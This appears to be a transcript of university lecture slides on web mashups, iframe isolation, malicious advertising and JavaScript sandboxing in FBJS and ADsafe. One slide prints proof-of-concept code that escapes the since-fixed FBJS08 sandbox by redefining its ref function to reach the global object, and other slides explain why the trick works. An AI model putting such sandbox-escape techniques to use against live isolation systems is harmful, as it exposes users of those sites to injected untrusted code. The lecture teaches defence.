mashups and language-based isolation john mitchell cs 142 winter 2009
TRANSCRIPT
Mashups and Language-Based Isolation
John Mitchell
CS 142 Winter 2009
Mashups
Advertisements
Social Networking Sites
Third-party content: Ads
Customer
accounts
Advertising network
Third-party content: Apps
User data
User-supplied application
Why Use Frames
Isolation Different frames can
represent different principals Same-origin policy: frame
can only read or modify frames from same scheme/host/port
Delegation Frame can draw only on its
own rectangle
Modularity Reuse the same content in
multiple places
Failure containment Parent may work even if
frame is slow to load or broken
src = 7.gmodules.com/...name = remote_iframe_7
src = google.com/…name = awglogin
Why Not To Use Frames
Inconvenient Container does fit content Quirky browser behavior
(history, sound) Performance impact
Security Concerns Frame hijacking Browser exploits
Inability to Communicate
Cannot send messages to cross-domain frames
Alternatives: Flash Rewriting: FBJS, ADsafe, Caja
postMessage
frames[0].postMessage("Hello world.");
document.addEventListener("message", receiver);function receiver(e) { if (e.domain == "example.com") { if (e.data == "Hello world") e.source.postMessage("Hello", e.domain, e.uri); }}
Referer Suppression Experiment
Measure how often Referer suppressed Placed a JavaScript advertisement for $200 283,945 impressions
Remember this from Lecture 12 by Collin?
How does this work?
Content
Ad
Advertiser Ad Network Publisher Browser
Ad Ad
Content
Ad
Ad Server
Can retrieve “image”that is part of ad
“Zero-click attacks”
Clients vulnerable Malware can attack
browser implementation errors
Browser-resident malware can use intended functionality to carry out malicious attacts
Easy to place $30 in advertisements
reach 50,000 browsers
Brian Krebs on Computer Security
Hackers Exploit Adobe Reader Flaw
Security Fix has learned that … security hole in … Adobe Reader … is actively being exploited to break into Microsoft Windows computers.According to information released Friday by iDefense, … Web site administrators … spotted hackers taking advantage of the flaw on Jan. 20, 2008, when tainted banner ads were identified that served specially crafted Acrobat PDF files designed to exploit the hole and install malicious software .
Ad serves PDF file that installs Zonebac, modifies search engine results
Problems with advertisements
Ad network, publisher have incentives to show ads Could place ads in iframe Rules out more profitable floating ads, etc.
Ad network and publisher can try to screen ads Yahoo! AdSafe Google Caja
Some limitations in current web Ads may contain links to “images” that are part of ad
Important to remember This is a very effective way to reach victims: $30-50 per 1000 User does not have to click on anything to run malicious code
14
Sandbox
A safe place for kids to play without hurting each other or anyone else
Possible approach
Goal Write a static analyzer to check untrusted
JavaScript and determine if it is malicious
Solvable? Very difficult because of functions that can
convert string to code and vice versa, for eg : eval
More likely to have a solution Find a well-defined and meaningful subset
of JavaScript for which this is solvable Prohibit problematic functions like eval
Some JavaScript examples
Use of this inside functions
Implicit conversions
var b = 10;var f = function(){ var b = 5;
function g(){var b = 8; return this.b;};g();}
var result = f();
var y = "a";var x = {toString : function(){ return y;}}x = x + 10;js> "a10"
// has as value 10
// implicit call toString
Sometimes tricky
Which declaration of g is used?
String computation of property names
for (p in o){....}, eval(...), o[s] allow strings to be used as code and vice versa
var f = function(){ var a = g();function g() { return 1;};function g() { return 2;};var g = function() { return 3;}return a;}
var result = f(); // has as value 2
var m = "toS"; var n = "tring";Object.prototype[m + n] = function(){return undefined};
Facebook FBJS
Subset of JavaScript for Facebook applications Application code is fetched from the
publisher's (untrusted) server and embedded as a subtree of the page.
Not placed in an Iframe.
Application code written is statically checked to see if it is valid FBJSFBJS code is re-written and certain run-time checks are added
FBJS restrictions
Security Goal Restrict access: Document Object Model (DOM), global
object Prevent clashes with other applications
Method 1: Filtering Forbid eval, with Disallow explicit access to properties (via the dot
notation o.p) valueOf, __parent__ , constructor.
Method 2: Rewriting Add application specific prefix to all top-level identiers.
Example : o.p is renamed to a1234_o.p Separate effective namespace of an application from
others
More about FBJS08
Some details of rewriting: this is re-written to ref(this)
ref is a function dened by the host (Facebook) in the global object
ref(x) = x if x 6= window else ref(x) = null Prevents application code form accessing the global
object. o[p] gets rewritten to o[idx(p)].
Returns error if p is a black-listed property, such as "__x__“
Facebook also provides libraries accessible within the application namespace, allow
applications to safely access certain parts of the global object.
Problem with FBJS08
Attack: Get a handle to the global object in the application code
Almost works var getthis = function() {return this;};
Except that this gets re-written to ref(this) and the code returns null.
But we can redefine ref itself ref is defined in the global object and application code is
disallowed from having handle to global object But can define a local ref in a local scope and defeat
FBJS08
try {throw (function() {return this;});}catch (f) {curr scp = f();}
Exploit code (now fixed!)
<a href="#" onclick="a()">Test A (Firefox and Safari)</a><script>var get_win = function get_scope(x){ if (x==0) {return this} else {get_scope(0).ref=function(x){return x}; return get_win(0)}};function a(){get_win(1).alert("Hacked!")}</script>
<a href="#" onclick="b()">Test B (Safari, Opera and Chrome)</a><script>function b(){ try {throw (function(){return this});} catch (get_scope){get_scope().ref=function(x){return x}; this.alert("Hacked!")}}</script>
Attack 1
ECMA-262 semantics for try{...} catch(f){...} says that whenever an exception is thrown:
New object o is created with property f pointing to the exception object
o is placed on top of the scope chain. (o does not have the activation object status).
The "this" of a function not defined in an activation object is the object containing it. In code above, this for get_scope resolves to o.Shadow the original ref by re-defining it in o.
try {throw (function(){return this});} catch (get_scope){get_scope().ref=function(x){return x};
Attack 2
ECMA-262 says that whenever a named recursive function f is created then the internal scope chain (fscp) of the function (environment pointer of the closure) is set to the current lexical scope with a dummy object (of) placed on top.
var get window = function f(x){if (x===0) {return this} else {f(x-1)};
Attack 2
When the function f is called, the current scope chain is replaced with fscp and an activation object for f is placed on top of itEvery recursive call to f will resolve to property f of the dummy object of (which is not an activation object)Accessing this inside f will resolve to of
Shadow the original ref by redefining it in of
var get window = function f(x){if (x===0) {return this} else {f(x-1)};
What is possible?
Filtering principle Subset of JavaScript: if program accesses property p, either p
appears textually in program, or is from list of “implicit” properties
Isolation principle 1 Subset of JavaScript: semantics-preserving capture-avoiding
renaming of identifiers (except names of predefined properties)
Isolation principle 2 Subset of JavaScript: no program can access any scope object
Isolation principle 3 Given a lists of forbidden properties PnoW and PnoRW , cannot write
properties in PnoW and cannot read or write properties in PnoRW
Rewriting principles Achieve some forms of isolation by restricting semantics
Isolation of property names (Jt)
Goal All property names that get accessed must appear
textually in the code
If the program does not contain eval, Function, o[..] etc which convert string to code
Then any property accessed is either in code or an implicit property access: toString, toNumber,
valueOf, length, prototype, constructor, message, arguments, Object, Array
Application If we want to prevent access to certain properties,
restrict to this sublanguage Jt and inspect code
Isolating scope objects (Js)
How can code in subset Jt access scope objects? Identifier this Object.prototype.valueOf, Array.prototype.sort
/concat/reverse can implicitly access this
Define subst Js of Jt Prohibit this, valueOf, sort, concat and reverse
Properties of Js Programs cannot access scope object Can rename variables; variable names can never
be accessed (explicitly) as properties But not variable with same name as native properties
Example:
Security Goal Restrict access: Document Object Model
(DOM), global object
Method 1: Filtering Forbid eval, with, ...
Method 2: Require special program idioms Access property p of object o by calling
ADSAFE.get(o, p)
Subtlety:
AdSafe restriction "All interaction with the trusted code must happen
only using the methods in the ADSafe object."
This may not be possible !// Somewhere in trusted codeObject.prototype.toString = function() { ... };...// Untrusted codevar o = {};o = o + “ “; // converts o to String
Bottom line: need to restrict definitions that occur in trusted code
Possible approach
Analyze the library of the host page Compute a blacklist PnoRW of security-
critical properties that could lead to security breach (How?)
Use subset Js + Filter for PnoRW
Conclusion
Modern sites incorporate third-party content Advertisements Applications
Third-party content must be isolated Or expose everyone to easy malicious attacks
Two basic approaches Use browser mechanism, such as iframes Filter, rewrite, and restrict execution of untrusted
content
Language-based sandboxing is tricky Subtle problems with recent methods Progress on reliable foundations is possible
Web Advertising
Deliver advertisements to viewers via Web
More effective and more profitable if user profile is known
Source: U Texas iSchool student study, www.ischool.utexas.edu/~i385e/studentsPPT/fogle_IA&WebAdv.ppt
Web ad placement and type Ad positions
Dark orange (strong), light yellow (weak)
Ads near rich content and navigation, and at the top-left do better
Ad types Banner Sidebar Pop-ups, pop-unders Floating Unicast
Banner
HTML code loads a specific website
Varies in content and shape
Horizontal
50 cents/ 1000
Sidebar
Skyscraper
Vertical
2-3 times larger than banner
Harder to scroll it off page
$1.00 - $1.50/ 1000
Pop-ups
Opens in its own window
Obscures the page your viewing
Forced to close or move it
Pop-unders
Opens under the content your viewing
Less intrusive than pop-up
Both are more effective than banner
Banners: 2-5 clicks/ 1000
Pop-ups: 30 clicks/ 1000
Can cost 4-10 times more than banner
Floating
Float or fly over page 5-30s
Obscure view; block mouse input
Gets attention: animation & sound
Powerful branding tool - hard to ignore
30 clicks/1000
$3 - $30/ 1000
Unicast
TV commercials that run in pop-up
10-30s
Same branding power as TV commercial + being able to go to website
50 clicks/1000
$30/1000From AOL.com
Web Publishing and Advertising
45
Content
Ad
Advertiser Ad Network Publisher Browser
AdAd
Content
Ad
Attacker Intermediary Intermediary Victim